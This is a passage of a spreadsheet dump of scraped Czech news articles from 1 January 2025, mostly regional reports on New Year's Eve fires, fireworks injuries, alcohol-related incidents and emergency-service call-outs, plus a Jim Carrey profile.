terorem. 👍 Petr Pan ( 1. ledna 2025 14:11 ) To auto najede do lidí a když uvidí co způsobilo vyšle toho co ho vezlo,aby si zastřílel do lidí samopalem, ale "patrně" to bylo úmyslné. Novoroční masakr v New Orleans : Auto vjelo do davu slavících lidí (1.1.2025) Teror v New Orleans (1.1.2025) Policie v New Orleans (31.12.2024) Silvestr 2024 v USA : Times Square v New Yorku Autor: Pavlína Horáková, simao, ČTK, Daniel Kristl Autoři person Pavlína Horáková person simao ČTK person Daniel Kristl Rubrika transition_slide Svět</t>
  </si>
  <si>
    <t>20250101_270_3694952873_1f8c585d7a1c92a1d9a0.html</t>
  </si>
  <si>
    <t>1f8c585d7a1c92a1d9a0</t>
  </si>
  <si>
    <t>Průzkum CzechSex zmapoval nejčastější sexuální odchylky v Česku</t>
  </si>
  <si>
    <t>Průzkum CzechSex zmapoval nejčastější sexuální odchylky v Česku Přečíst zprávu Předplaťte si WIRED WIRED přináší reportáže z budoucnosti. WIRED je časopis, který vám řekne, co bude dál ‑ nápady, technologie, kultura, byznys a další. WIRED je ale také komunita lidí. Připojte se k nám. Prohlédněte si varianty předplatného Předplatné Čtěte ještě 30 dní zdarma! První tři články jsou u nás zdarma. Pro další čtení se prosím registrujte a vyzkoušejte výhodné předplatné na zkoušku. První měsíc nic neplatíte a můžete ho kdykoli zrušit. Zpět na hlavní stránku WIRED Nové vydání magazínu WIRED právě v prodeji! Na více než 200 stranách přináší aktuální vydání WIRED zejména nálož článků o vesmíru, ale i novinky v technologiích, vědě a kultuře. V prodeji je od 4. prosince, případně už nyní v našem e‑shopu. Více článků Aktuality z vědy: moderní běžci, škodlivý alkohol a realistický optimismus Vítejte u prvního WIRED Science Hub letošního roku. Po dvou vánočních speciálech se vracíme k tradičnímu formátu pěti novinek ze světa vědy. Píšeme o tom, že na alkoholu možná budeme podobně jako na cigaretách vídat varování o tom, že jeho konzumace zvyšuje riziko rakoviny. Věda také přináší naději lidem trpícím migrénou – nový lék atogepant funguje okamžitě. Autor: Pavla Hubálková Autor person Pavla Hubálková</t>
  </si>
  <si>
    <t>3220</t>
  </si>
  <si>
    <t>3660</t>
  </si>
  <si>
    <t>20250101_271_3694863595_3c6ef0c316c32ac53c4f.html</t>
  </si>
  <si>
    <t>3c6ef0c316c32ac53c4f</t>
  </si>
  <si>
    <t>Alkohol, rvačky, průjmy i požár. Takový byl Silvestr ve Zlínském kraji</t>
  </si>
  <si>
    <t>Alkohol , rvačky, průjmy i požár. Takový byl Silvestr ve Zlínském kraji Od šesté hodiny večerní do šesté hodiny ranní přijali policisté bezmála 140 oznámení, která se týkala především rušení nočního klidu a přestupků proti veřejnému pořádku nebo občanskému soužití. „U většiny těchto skutků sehrál roli alkohol . Lidé si také často stěžovali, že je obtěžuje hluk od odpalované zábavní pyrotechniky,“ uvedla mluvčí policie Simona Kyšnerová. play_fill Krimi Oproti loňskému roku bylo zhruba o čtyřicet volání na linku 158 více. Záchranáři v kraji zasahovali u víc než stovky událostí a operátorky zdravotnického operačního střediska přijaly přes 160 volání na tísňovou linku 155. Během Silvestra a prvních hodin Nového roku nevyjížděli policisté k žádné závažnější dopravní nehodu. „V průběhu noci jsme však narazili na čtyři podnapilé řidiče, kteří jsou podezřelí ze spáchání trestného činu ohrožení pod vlivem návykové látky. Tři z nich nadýchali nad jedno promile, jeden pak nad dvě promile,“ dodala Kyšnerová. Alkohol se nevyhnul ani mladistvým. „Dvě pacientky mladšího věku ho požily takové množství, že skončily na dětské jednotce intenzivní péče,“ uvedla mluvčí záchranářů Gabriela Netopilová Sluštíková. Zdravotnické týmy zasahovaly také u třech desítek úrazů a další pacienty ošetřily po napadení. Zlínsko „Řešili jsme také jeden typický úraz spojený s použitím zábavné pyrotechniky. Chlapce petarda poranila v obličeji,“ doplnila Sluštíková. Nad ránem zaměstnal hasiče i policisty požár rodinného domu v Jaroslavicích . Starší muž se přitom nadýchal zplodin. V domě se vznítila podlaha v podkroví. „Hasiči začali podlahu rozebírat. Následně dohašovali skrytá ohniska, k jejichž vyhledání využili termokameru,“ doplnil mluvčí hasičů Kamil Tlušťák. Výše škody i příčina požáru jsou zatím v šetření. Okolo páté hodiny ranní došlo ve Zlíně k potyčce mezi dvěma podnapilými cizinci, kdy jeden z mužů skončil v nemocnici. Okolnostmi tohoto incidentu se nyní zabývají zlínští policisté. Na traumatologii krajské nemocnice T. Bati ve Zlíně bylo ošetřeno kolem a po půlnoci 10 lidí, z toho devět pod vlivem alkoholu včetně jednoho, který kombinoval alkohol s návykovou látkou. Většina z nich po pádech, kdy naštěstí utrpěli pouze povrchová poranění typu oděrky a rány, které jim lékaři zašili a propustili je domů. „Vypíchnout by se dal případ muže, který popsal, že po vypití 13 panáků tvrdého alkoholu „proběhl“ skleněnou výplní dveří,“ uvedla mluvčí KNTB Dana Lipovská. Hospitalizován v nemocnici zůstal muž, který má po rvačce zlomenou horní čelist a nos. „Ten čeká na vystřízlivění a operaci,“ dodala Lipovská. Po půlnoci bylo dost plno také na interní pohotovosti, lékaři ošetřili celkem devět lidí s průjmovými problémy, křečemi v břiše, problémy se zažíváním. Nikdo z nich nebyl hospitalizován. Autor: Iva Nedavašková Autor person Iva Nedavašková</t>
  </si>
  <si>
    <t>29400</t>
  </si>
  <si>
    <t>35840</t>
  </si>
  <si>
    <t>20250101_272_3694846820_e82044557b7b824eb52d.html</t>
  </si>
  <si>
    <t>e82044557b7b824eb52d</t>
  </si>
  <si>
    <t>Silvestr poznamenaly úrazy od petard, hasiči hlásí nejvíc požárů za sedm let</t>
  </si>
  <si>
    <t>Silvestr poznamenaly úrazy od petard, hasiči hlásí nejvíc požárů za sedm let 1. 1. 2025 | Zdroj: ČTK , ČT24 Zprávy ČT24: Zásahy složek IZS kvůli silvestrovským oslavám (zdroj: ČT24) Mnoho výjezdů kvůli silvestrovským oslavám evidují hasiči a také záchranáři. Jen v Praze zasahovali u stovky událostí, v devíti případech šlo o zranění způsobená zábavní pyrotechnikou. Záchranáři po celé republice řešili také otravy alkoholem nebo napadení. Hasiči hlásí nejvíc požárů za sedm let, hořelo i několik rodinných domů. Během silvestrovské noci policisté nezaznamenali žádnou mimořádnou událost, řešili ale víc konfliktních případů než v běžný den. Pražští záchranáři vyjeli k 348 případům, s oslavami příchodu nového roku souvisela stovka. Zranění zábavní pyrotechnikou bylo devět, řekl jejich mluvčí Karel Kirs. „Ve speciálu Golem bylo ošetřeno celkem 27 pacientů, z nichž třináct bylo transportováno do zdravotnického zařízení. Nejzávažnější případ představoval úraz hlavy, který si vyžádal napojení pacienta na umělou plicní ventilaci a následný transport do traumacentra,“ informoval mluvčí na sociální síti X. Na průběh oslav v hlavním městě dohlíželi přímo z lodi na Vltavě i vodní záchranáři. S používáním zábavní pyrotechniky v částech Prahy , kde je to zakázané, nebyly podle policejní mluvčí Evy Kropáčové před půlnocí žádné zásadní problémy, s příchodem nového roku se to ale změnilo hlavně v okolí Václavského a Staroměstského náměstí . „V průběhu noci policisté přistihli přímo při odpalování pyrotechniky v centru města bezmála padesát osob, z nichž se v drtivé většině jednalo o cizince. Těmto přestupcům policisté na místě uložili pokutu v řádech až několika tisíc korun,“ uvedla mluvčí na policejním webu. V použití pyrotechniky byl nicméně podle ní loňský silvestr jedním z nejklidnějších. Po půlnoci podle Kropáčové výrazně přibylo také oznámení o potyčkách, konfliktech a dalších událostech spojených s pitím alkoholu . Policisté například zadrželi muže, který v Praze 10 poškodil bezpečnostním kladívkem okna u deseti zaparkovaných vozidel, a také opilého muže, který na Smetanově nábřeží hodil skleněnou láhev po policejním vozidle. Při potyčce během silvestrovských oslav na ubytovně jeden člověk utrpěl řezné poranění. „V současné chvíli věc prošetřujeme pro podezření z trestného činu pokus těžké újmy na zdraví, ze kterého je podezřelá osmnáctiletá dívka,“ uvedla Kropáčová. Policisté podle ní během noci také několikrát asistovali záchranné službě při resuscitací lidí a vypátrali dva lidi, kteří vyhrožovali sebevraždou. Ve středních Čechách silvestrovské oslavy poznamenaly častější úrazy od zábavní pyrotechniky. Záchranáři zasahovali u šesti zraněných a čtyř popálených, což je více než loni. Proti loňskému silvestru výrazně přibylo i pacientů, které zmohl alkohol . Události: Silvestr byl náročný pro zdravotníky i záchranáře (zdroj: ČT24) Zatímco policisté a hasiči v Libereckém kraji hodnotí silvestrovské oslavy jako poměrně klidné, záchranáři zažili perný přelom roku. Na silvestra až do středečního rána se nezastavili, řešili přes 260 událostí, což je zhruba o stovku víc než běžně. O půlnoci jim na dispečinku svítilo číslo 199, to dlouho nikdo nepamatuje, a do rána bylo dalších 65 událostí, řekl krátce po 06:00 mluvčí Zdravotnické záchranné služby Libereckého kraje Michael Georgiev. „Ošetřili jsme sedm lidí, kteří se zranili při odpalování pyrotechniky, ale také desítky zranění a intoxikací alkoholem , desítky napadení. Záchranáři říkali, že tolik napadení a agrese nepamatují, naštěstí jsme nezaznamenali napadení zdravotníků. Ale většina těch událostí byla spjata s alkoholem ,“ řekl Georgiev. Pokud jde o úrazy pyrotechnikou, i když jich bylo víc než v posledních letech, šlo podle něj naštěstí o lehká zranění. Požár domu i kotelny V Pardubickém kraji o silvestrovské půlnoci hořel byt v panelovém domě ve Svitavách. Jednoho člověka záchranáři odvezli s lehčím zraněním na chirurgii místní nemocnice. Evakuace domu nebyla nutná. Protialkoholní záchytná stanice v Pardubicích byla na silvestra plná již v 20:00, informovala pardubická městská policie. Jihomoravští hasiči zasahovali v noci na středu u požáru dvou rodinných domů na Vyškovsku, v Heršpicích a Studnicích, a jednoho ve Svatobořicích-Mistříně na Hodonínsku. Ve Studnicích převzali dva lidi do péče záchranáři. V jednom případě také hořelo dříví v kotelně kláštera dominikánek ve Střelicích na Brněnsku, který slouží jako domov pro zdravotně postižené. Z objektu se muselo evakuovat 55 lidí, ale po ukončení zásahu se mohli vrátit a nikdo se nezranil. Škoda činila 250 tisíc korun. V Moravskoslezském kraji se zranilo během silvestrovské noci při odpalování pyrotechniky osm lidí. Záchranáři v regionu měli také za sebou rušnou noc. „Nárůst počtu zásahů byl více než dvojnásobný oproti běžným nocím, uvedl jejich mluvčí Lukáš Humpl. Rvačky i rušení nočního klidu Pyrotechnika v Ústeckém kraji způsobila několik amputací, ať už ruky nebo článků prstů. Záchranáři vyjížděli k desítkám případů. Zranění zábavní pyrotechnikou si vyžádalo jejich zásah desetkrát, další události se týkaly výjezdů k lidem, kteří požili přemíru alkoholu nebo se v důsledku jeho požití poranili. Oslavy v Královéhradeckém kraji provázela fyzická napadení, rvačky, výtržnosti, rušení nočního klidu a drobné požáry. Většinu z nich způsobili opilci. Policie v kraji od úterních 18:00 do středečních 06:00 přijala okolo 190 oznámení, což bylo dle mluvčí Karolíny Macháčkové na úrovni loňského roku. Zdravotničtí záchranáři řešili tři drobné popáleniny od zábavní pyrotechniky. Na Vysočině byly silvestrovské a novoroční oslavy podle hasičů klidné. Bez větších požárů se obešly i v Olomouckém kraji. Ve Zlínském kraji byly oslavy pro policii o něco rušnější než loňské. Obešly se však bez mimořádných událostí. Od úterních 18:00 do středečních 06:00 přijalo operační středisko krajského ředitelství policie téměř 140 oznámení, loni jich bylo o čtyři desítky méně. Více konfliktů než v běžný den Policie během silvestrovské noci vyjížděla k mnohem více konfliktním situacím než v běžný den, informovala na sociální síti X. Bylo mezi nimi třeba napadání a domácí násilí. Případů, kterými se zabývala, bylo podobné množství jako v běžný pracovní den. Celorepublikově policisté řešili celkem 3250 případů. „Což je přibližně stejně jako v běžný pracovní den,“ doplnila policie na síti X. Na silvestra uvedla, že na bezpečnost při oslavách příchodu nového roku dohlédnou tisíce policistů, kteří se zaměří na frekventovaná místa i takzvané měkké cíle, což jsou například obchodní centra, letiště, nádraží a další prostory s velkou koncentrací lidí a nízkou úrovní zabezpečení. V ulicích byly třeba v Praze o silvestrovské noci také hlídky s dlouhými zbraněmi. Policie nicméně ještě před začátkem novoročních oslav uvedla, že pro území České republiky nemá informace o konkrétní hrozbě. Rušná noc hasičů Hasiči o silvestrovské noci evidují celkem 357 požárů, což je nejvíce za minimálně sedm let. S pyrotechnikou podle předběžných informací souviselo 190 výjezdů, víc než před rokem. Nejrušnější noc měli hasiči v Moravskoslezském a Středočeském kraji . Před rokem bylo požárů mezi 20:00 na silvestra a 06:00 na Nový rok 260, s pyrotechnikou souviselo 158 z nich. Vyplývá to z informací, které poskytla mluvčí Hasičského záchranného sboru ČR Lucie Pipiš. „Největší nárůst událostí hasiči zaznamenali v prvních dvou hodinách po půlnoci, kdy vyjeli k více než dvěma stům požárům, jejichž příčinou byla mimo jiné také zábavní pyrotechnika,“ popsala mluvčí. Požárů začalo pomalu ubývat po 03:00. Nejčastěji hořely odpadkové koše, kontejnery nebo zbytky odpálené pyrotechniky. Od ní často vzplanuly keře, tráva nebo živé ploty. Štítky info@ceskatelevize.cz Rozcestník kanálů Autor: den Autor person den</t>
  </si>
  <si>
    <t>101320</t>
  </si>
  <si>
    <t>20250101_273_3694819359_c74ce0f5bf2cfff9c7a5.html</t>
  </si>
  <si>
    <t>c74ce0f5bf2cfff9c7a5</t>
  </si>
  <si>
    <t>Jim Carrey. Komik s&amp;nbsp;depresemi a&amp;nbsp;jeho složité hledání cesty z&amp;nbsp;prázdnoty</t>
  </si>
  <si>
    <t>Jim Carrey . Komik s&amp;nbsp;depresemi a&amp;nbsp;jeho složité hledání cesty z&amp;nbsp;prázdnoty Jim Carrey . Komik s depresemi a jeho složité hledání cesty z prázdnoty Blbý a blbější, Ace Ventura, Maska nebo Yes Man – to jsou komické filmy, které z Jima Carreyho udělaly hvězdu komedie. Jeho vlastní svět je však blíže vážnějším rolím. Jim Carrey je takový herecký chameleón. Dokáže si bravurně střihnout šílenou postavu Lloyda v sérii Blbý a blbější i vážnou roli osamělého a nesmělého Joela v dramatu Věčný svit neposkvrněné mysli. Jen málo herců je schopno vstoupit na obě strany barikády a ještě méně slavných zvládne otevřeně mluvit o osobních problémech. Carrey se totiž po dlouhá léta potácel v depresích, přestože jako herec předváděl jeden gag za druhým. Cesta z chudoby k bohatství i prázdnotě Carreyho životní rozpoložení koření v dětství. Narodil se jako nejmladší ze čtyř dětí v roce 1962 v malém kanadském městě Newmarket . Rodina nepatřila mezi nejbohatší, což byl možná jeden z faktorů, který mladíka hnal za úspěchem. Když jeho otec přišel o práci, ocitli se na hranici chudoby. Do toho všeho měl velmi těžce nemocnou matku, které mnohdy ani nepomáhaly léky na bolest. „Kde se ve mně vzal talent v komedii? V zoufalství,“ líčil Carrey v rozhovoru pro CBS News v roce 2017. „Měl jsem nemocnou mámu. Chtěl jsem, aby se cítila lépe. A tak jsem k ní chodil a dělal vylomeniny a škleby. Dokonce jsem se odrazil od zdi a vrhl se ze schodů, aby se mohla pobavit a cítit se lépe.“ V šestnácti odešel kvůli zoufalé finanční situaci ze školy a začal se živit jako bavič ve večerních klubech v Torontu . Zde objevil kouzlo improvizace a zařekl se, že každé jeho číslo bude jiné. Přišlo mu to tak snadné, ale tvrdě narazil. Jeho první vystoupení se vůbec neujala. Zaplatil si tedy kurz herectví a začal na sobě tvrdě pracovat. Najednou se vše obrátilo o 180 stupňů a Carrey bavil nadšené publikum. Brzy si jej všimli vyhledávači talentů a mladý komik své první velké představení předvedl v Las Vegas v roce 1982. Tam se mu otevřely brány k filmu. Těch má nyní na kontě několik desítek. Sláva a peníze však nepřinesly Carreymu vnitřní klid. Ve svých veřejných vystoupeních a rozhovorech se dnes slavný a uznávaný herec několikrát otevřeně svěřil, že trpěl obdobími těžké deprese. Přestože je velká část jeho rolí založena na rozdávání radosti a smíchu, jeho duše často přetékala smutkem a podivným pocitem prázdnoty. Trailer k filmu Blbý a blbější: Mučivé stavy se u něj nejvíce rozvinuly po rozchodu s druhou ženou Lauren Hollyovou. Z manželství, které trvalo jen osm měsíců, odešel v depresích. Skončil na silných antidepresivech, ale cestu z hrůzy, kterou zažíval, nemohl najít. V té době přesto dokázal natáčet. Zklidnění mysli pomocí transcendentální meditace Carrey se s těžkým osudem dokázal vyrovnat stejně rozhodně jako se špatnou finanční rodinnou situací v mládí. V posledních letech se začal věnovat spiritualitě a transcendentální meditaci, aby touto cestou mohl najít určitou životní rovnováhu. Přijal jakousi životní filozofii, v níž klade důraz na přítomný okamžik a vnímání reality bez přetvářky a hlavně na zklidnění. Přestal pít kávu i alkohol , nebere žádné léky. Když se Jima Carryho zeptáte, jakou roli v jeho životě hraje náboženství, odpoví vám, že je někdy buddhista, jindy křesťan či muslim. Jeho víra ale není vázána žádnou doktrínou, je osobní i mystická. Věří, že zázraky se splní, pokud v ně věříte. Jako důkaz této víry považuje skutečnost, že se mu podařilo vybudovat si kariéru, o které vždy jen snil. Herectví jako lék Také ale tvrdí, že ekvivalentem jeho víry je i herectví. To prý natolik miluje, že by mohl hrát pořád. Chce bavit i překvapovat lidi. Přitom se nechce dívat do minulosti, ani do budoucnosti. Žije zkrátka bezprostřední přítomností. Přesto si z minulosti odnáší jeden stín. V roce 2015, krátce po rozchodu s ním, spáchala sebevraždu vizážistka Cathriona Whiteová, přičemž podle bulváru zanechala herci vzkaz plný výčitek. Jim Carrey , kdysi chudý kanadský chlapec, dokázal díky své píli udělat závratnou kariéru. Milují jej lidé po celém světě. Přesto tento zdánlivě dokonalý život nemusí znamenat bytí bez starostí. S nevídanou otevřeností dokáže hovořit o svých problémech i o možnostech, jak je řešit. Tím chce inspirovat lidi s podobným osudem, aby se také nebáli o svých obtížích mluvit a vyhledali pomoc. Aktualizováno 1. 1. na základě komentáře v diskuzi v souvislosti se sebevraždou hercovi expřítelkyně. Zdroje: cbsnews.com , mensgroup.com , wikipedia.org , express.cz</t>
  </si>
  <si>
    <t>20250101_274_3694809473_b168978601c7b20a072c.html</t>
  </si>
  <si>
    <t>b168978601c7b20a072c</t>
  </si>
  <si>
    <t>Silvestrovská noc byla v Libereckém kraji náročná především pro záchranku, roste agresivita lidí</t>
  </si>
  <si>
    <t>Silvestrovská noc byla v Libereckém kraji náročná především pro záchranku, roste agresivita lidí Zatímco policisté a hasiči v Libereckém kraji hodnotí silvestrovské oslavy jako poměrně klidné, záchranáři zažili perný přelom roku. Na silvestra až do dnešního rána se nezastavili, řešili přes 260 událostí, což je zhruba o stovku víc než běžně. O půlnoci jim na dispečinku svítilo číslo 199, to dlouho nikdo nepamatuje, a do rána bylo dalších 65 událostí. "Ošetřili jsme sedm lidí, kteří se zranili při odpalování pyrotechniky, ale také desítky zranění a intoxikací alkoholem , desítky napadení. Záchranáři říkali, že tolik napadení a agrese nepamatují, naštěstí jsme nezaznamenali napadení zdravotníků. Ale většina těch událostí byla spjata s alkoholem," řekl mluvčí Zdravotnické záchranné služby Libereckého kraje Michael Georgiev Georgiev . Pokud jde o úrazy pyrotechnikou, i když jich bylo víc než v posledních letech, šlo podle něj naštěstí o lehká zranění. Policie hodnotí silvestrovskou noc jako klidnější. "Od 18:00 31. prosince do dnešních 05:30 jsme na tísňové lince přijali 113 hovorů. Většina z nich se týkala narušování občanského soužití v podobě verbálního ale i fyzického napadání jak na veřejnosti mezi cizími lidmi, tak i v soukromí mezi známými nebo rodinnými příslušníky, převážně jsme tyto případy kvalifikovali jako přestupky " řekla krajská policejní mluvčí Ivana Baláková . Jednu událost řeší podle Balákové policie pro podezření z trestného činu výtržnictví. "Došlo k němu v Novém Městě pod Smrkem , kde skupinka opilců napadla tři mladíky. Ten případ je zatím v počátku a stále ho prošetřujeme," doplnila policejní mluvčí. Tři řidiče přistihli policisté za volantem pod vlivem alkoholu , naměřili jim od 1,1 do 1,5 promile alkoholu v dechu. Kolem včerejší 20. hodiny se policistům podařilo vypátrat člověka se sebevražednými úmysly ještě dříve, než si stačil ublížit. "Předali jsme ho do péče lékařů," uvedla Baláková . Policie také pátrala po 57leté ženě z Harrachova , která zhruba hodinu po půlnoci odešla z domova a od té doby se nehlásila. S žádostí o pomoc se na policii obrátil její manžel, který zjistil, že žena zmizela z domu. Příběh má šťastný konec, ženu se dnes ráno podařilo vypátrat živou. "Do pátrací akce po pohřešované ženě jsme dnes ráno nasadili vrtulník vybavený termovizí, který nám ji pomohl najít. Nacházela se poblíž Mumlavských vodopádů, byla podchlazená a vyčerpaná. Do péče si ji převzali zdravotníci. Pátrací akci jsme proto odvolali v 8.20," dodala policejní mluvčí. Za poměrně klidnou označili silvestrovskou noc hasiči, od silvestrovských 18:00 do dnešních 06:00 měli zhruba 21 výjezdů, z toho 12 bylo požárů. "Ty požáry byly naštěstí odpadní kontejnery a obaly po zábavní pyrotechnice. Šlo o takové drobnější požáry většinou beze škody nebo jen se škodou způsobenou na těch kontejnerech. Mezi dalšími událostmi bylo sedm technických pomocí , jedna dopravní nehoda a jeden planý poplach. Loni jsme za stejnou dobu evidovali devět požárů, což je nárůst o 25 procent, ale stejně 12 požárů je poměrně klidná noc," dodala mluvčí Hasičského záchranného sboru Libereckého kraje Monika Tóthová . Autor: ČTK, Martina Petrášková Autoři ČTK person Martina Petrášková</t>
  </si>
  <si>
    <t>19100</t>
  </si>
  <si>
    <t>11390</t>
  </si>
  <si>
    <t>20250101_275_3694812452_e90c9325abd208f64846.html</t>
  </si>
  <si>
    <t>e90c9325abd208f64846</t>
  </si>
  <si>
    <t>Muži explodovala zábavní pyrotechnika v ruce. Zranila ho na dlani a prstech</t>
  </si>
  <si>
    <t>Muži explodovala zábavní pyrotechnika v ruce. Zranila ho na dlani a prstech Na Silvestra přes den vyjížděly jihočeské posádky zdravotnické záchranné služby ke 154 případům, což je mírně nad celoročním denním průměrem. "Jednalo se především o starší pacienty se zhoršením interních onemocnění jako jsou dušnosti, horečnaté stavy a onemocnění oběhové soustavy," uvedla Petra Kafková. Na noční směnu od 18:00 do 6:00 opět posílili Zdravotnické operační středisko o jednoho operátora. Výjezdová činnost byla zajištěna ve stejném rozsahu jako v ostatních dnech v roce, tedy 53 výjezdovými skupinami na 33 základnách v celém Jihočeském kraji. Během silvestrovské noci řešila záchranka podle mluvčí 121 událostí, což je sedmdesátiprocentní zvýšení oproti průměrnému počtu výjezdů při běžných nočních směnách a je v přímé souvislosti s oslavami konce roku. play_fill Táborsko "V 19 případech se jednalo o úrazy pod vlivem alkoholu a intoxikace alkoholem , dalších 6 osob se zranilo při vzájemných potyčkách," sdělila mluvčí záchranky. • Českobudějovičtí záchranáři společně s hasiči ve 21 hodin vyjížděli na pomoc muži, který pod vlivem alkoholu spadl do potoka a nebyl schopen se vlastními silami z vody dostat. Ve vodě strávil minimálně dvacet minut a byl podchlazený. Po ošetření namístě a zajištění tepelného komfortu jej zdravotníci předali do péče kolegům z urgentního příjmu českobudějovické nemocnice. • Prachatičtí záchranáři ošetřili třicet minut po půlnoci jednu mladistvou osobu intoxikovanou alkoholem . Po poskytnutí přednemocniční neodkladné péče byla předána do péče dětského oddělení prachatické nemocnice. • Českokrumlovští záchranáři zasahovali krátce před 23. hodinou u úrazu způsobeného pyrotechnikou. Událost se stala na Lipně . Muži při odpalování explodovala pyrotechnika v ruce zranila ho v oblasti dlaně a prstů ruky. Jednalo se i jediné zranění zábavní pyrotechnikou, které naši záchranáři letos na silvestra ošetřili. • Všechna lůžka na protialkoholní záchytné stanici v Českých Budějovicích byla zaplněna již třicet minut po půlnoci. V průběhu posledního dne v roce zasahovaly posádky ZZS JčK také u devíti dopravních nehod. "Ve 22.53 hodin byl na Zdravotnické operační středisko nahlášen střet tří osobních vozidel u obce Studánky. K události okamžitě vyjely tři pozemní posádky z Vyššího Brodu a Českého Krumlova a vrtulník Letecké záchranné služby. Záchranáři na místě ošetřili tři zraněné. Muže středního věku, který při nehodě utrpěl těžké zranění v oblasti hlavy a pánve. Záchranáři ho zajistili žilní linkou, podali potřebné léky a imobilizovali krčním límcem, pánevním fixátorem a uložením do celotělové vakuové matrace. Letečtí záchranáři zraněného transportovali na traumacentrum českobudějovické nemocnice. Sem byla po poskytnutí obdobné péče transportována i druhá těžce zraněná osoba, sedmapadesátiletá žena, s podezřením na poranění v oblasti hrudníku, břicha a pánve," popsala Petra Kafková. Autor: Lenka Novotná Autor Lenka Novotná</t>
  </si>
  <si>
    <t>32290</t>
  </si>
  <si>
    <t>38070</t>
  </si>
  <si>
    <t>20250101_276_3694777124_33292eee99a694b2b804.html</t>
  </si>
  <si>
    <t>33292eee99a694b2b804</t>
  </si>
  <si>
    <t>Záchranáře na jihu Moravy při novoročních oslavách zaměstnali hlavně opilí lidé. V sanitce pomohli na svět holčičce.</t>
  </si>
  <si>
    <t>Záchranáře na jihu Moravy při novoročních oslavách zaměstnali hlavně opilí lidé. V sanitce pomohli na svět holčičce. Jihomoravští záchranáři měli během oslav příchodu nového roku napilno. Nejčastěji pomáhali opilým lidem, zraněným po pádu na náledí či od pyrotechniky. Pozitivním zakončením noci byl porod zdravé holčičky přímo v sanitce, který proběhl ve Starém Lískovci . Jihomoravští záchranáři podle svých slov zažili poměrně klidnou noc. Do půlnoci neměli příliš výjezdů, pak však začal počet událostí narůstat. Do šesti hodin ráno jich zaznamenali zhruba osm desítek. Na oslavy příchodu nového roku se dobře připravili. „Posílili jsme operační středisko, v rámci města Brna přidali navíc záchranářskou posádku. V centru jihomoravské metropole jsme v nejexponovanějším čase měli předsunutou velkokapacitní sanitku, kdyby bylo třeba pomoci,“ popsala mluvčí jihomoravské záchranky Michaela Bothová . Velkou část pacientů tvořili lidé s otravou alkoholem . Lidé posilnění alkoholem taktéž v několika případech upadli a způsobili si úraz. V tom hrálo svou roli zřejmě také náledí. V péči měli taktéž pacienty, kteří se zúčastnili různých potyček. „Postarali jsme se i o osoby, které si zranily obličej nebo ruce při manipulaci s pyrotechnikou, byla jich přibližně desítka. Evidovali jsme také několik dopravních nehod, i zde mohlo mít vliv náledí,“ doplnila Bothová. Po páté hodině ranní pak dispečink vyslal záchranářskou posádku do brněnského Starého Lískovce . Zdravotníci přímo v sanitce pomohli při překotném porodu na svět zdravé holčičce. Když na místo přijel i lékařský tým, pomohl s ošetřením miminka a maminky. Obě pak sanitka převezla ke kontrole do porodnice. Autor: Anna Pospišilová Autor person Anna Pospišilová Rubrika transition_slide Zprávy &amp;gt; Společnost</t>
  </si>
  <si>
    <t>21920</t>
  </si>
  <si>
    <t>20250101_277_3694784286_351a0a72caa812fb4a28.html</t>
  </si>
  <si>
    <t>351a0a72caa812fb4a28</t>
  </si>
  <si>
    <t>Hasiči prožili nejnáročnější silvestr v historii, plné ruce práce měli i záchranáři</t>
  </si>
  <si>
    <t>Hasiči prožili nejnáročnější silvestr v historii, plné ruce práce měli i záchranáři Foto: HZS JMK Uplynulý Silvestr hodnotí jihomoravští hasiči co do počtu událostí jako nejnáročnější v historii kraje. Nárůst zaznamenali především u požárů. Od 20.00 do 4.00 vyjely jednotky k 56 událostem, z toho ve 41 případech se jednalo o požár. Většinou šlo o menší požáry kontejnerů a odpadu. Zasahovat ale museli i u požárů v rodinných domech. Na webu hasičů to uvedl jejich mluvčí Jaroslav Mikoška. Při požárech se zranili tři lidé Při požárech se podle něj zranili tři lidé, škody se předběžně pohybují kolem 2,4 milionu korun a zásahy hasiči uchránili majetek v hodnotě přes 13 milionů korun. „První letošní výjezd se týkal požáru tújí v zahradě u rodinného domu ve Slavkově u Brna . Jednotky jsme tam vyslali 20 minut po půlnoci. První dopravní nehodu jsme museli řešit téměř dvě hodiny po půlnoci v Brně v Novolíšeňské ulici, kde se po střetu dvou osobních vozidel zranili tři lidé,“ upřesnil Mikoška Hořelo dřevo v kotelně i rodinný dům K větším zásahům patří likvidace požáru dřeva v kotelně bytového domu na okraji obce Střelice na Brněnsku. „Škoda se pohybuje kolem 250 tisíc korun a příčinou byla nedbalost obsluhy kotle na dřevoplyn,“ uvedl mluvčí. Krátce po 23. hodině vyjely jednotky k požáru v rodinném domě ve Svatobořicích-Mistříně na Hodonínsku. „Požár se podařilo zlikvidovat ve 23.44 hodin a způsobil škodu v odhadu 950 tisíc korun,“ řekl Mikoška. Plameny v domě udělaly škodu skoro za milion Škodu za 900 tisíc korun pak způsobily plameny, které vyjeli hasiči likvidovat do jedné místností rodinného domu v Heršpicích na Vyškovsku. Požár uhasili ve 2.49 hodin. „K dalšímu požáru v rodinném domě na Vyškovsku vyjely jednotky krátce před čtvrt na dvě. Hořelo v obci Studnice a v péči záchranky skončili dva lidé. Požár způsobil škodu za 100 tisíc korun,“ dodal mluvčí. Záchranáři vyjížděli ke rvačkám i pádům opilých lidí na náledí Zdravotníci jihomoravské záchranky měli podle mluvčí Michaely Bothové do půlnoci relativní klid, pak však začal počet událostí narůstat. Do šesti hodin ráno jich zaznamenali zhruba osm desítek, což je srovnatelné s předchozími roky. V běžných dnech přitom evidují za stejný čas přibližně dvě až tři desítky zásahů. „Postarali jsme se ve větší míře o pacienty s otravou alkoholem , ale také o ty, kteří po požití většího množství alkoholu upadli a způsobili si úraz. V těchto případech mohlo svoji roli sehrát i náledí. V péči jsme měli také pacienty, kteří se zúčastnili různých potyček. Postarali jsme se i o osoby, které si zranily obličej nebo ruce při manipulaci s pyrotechnikou, byla jich přibližně desítka. Evidovali jsme také několik dopravních nehod, i zde mohlo mít vliv náledí,“ sdělila zpravodajskému portálu BRŇAN Michaela Bothová. V sanitce se narodila holčička Po páté hodině ranní pak dispečink vyslal záchranářskou posádku do brněnského Starého Lískovce , kde zdravotníci přímo v sanitce pomohli při překotném porodu na svět zdravé holčičce. „Když na místo přijel i lékařský tým, pomohl s ošetřením miminka a maminky. Obě pak sanitka převezla ke kontrole do porodnice,“ dodala mluvčí. Ženu stíhají za loupež Policisté řešili od 18 do 6 hodin 232 případů. Z loupeže podezírají ženu z Břeclavska, která napadla svého známého a odcizila mu peněženku. „Starší muž skončil se zraněními v nemocnici, podezřelou dohledala a se souhlasem státního zástupce zadržela policejní hlídka,“ upřesnil mluvčí policie Pavel 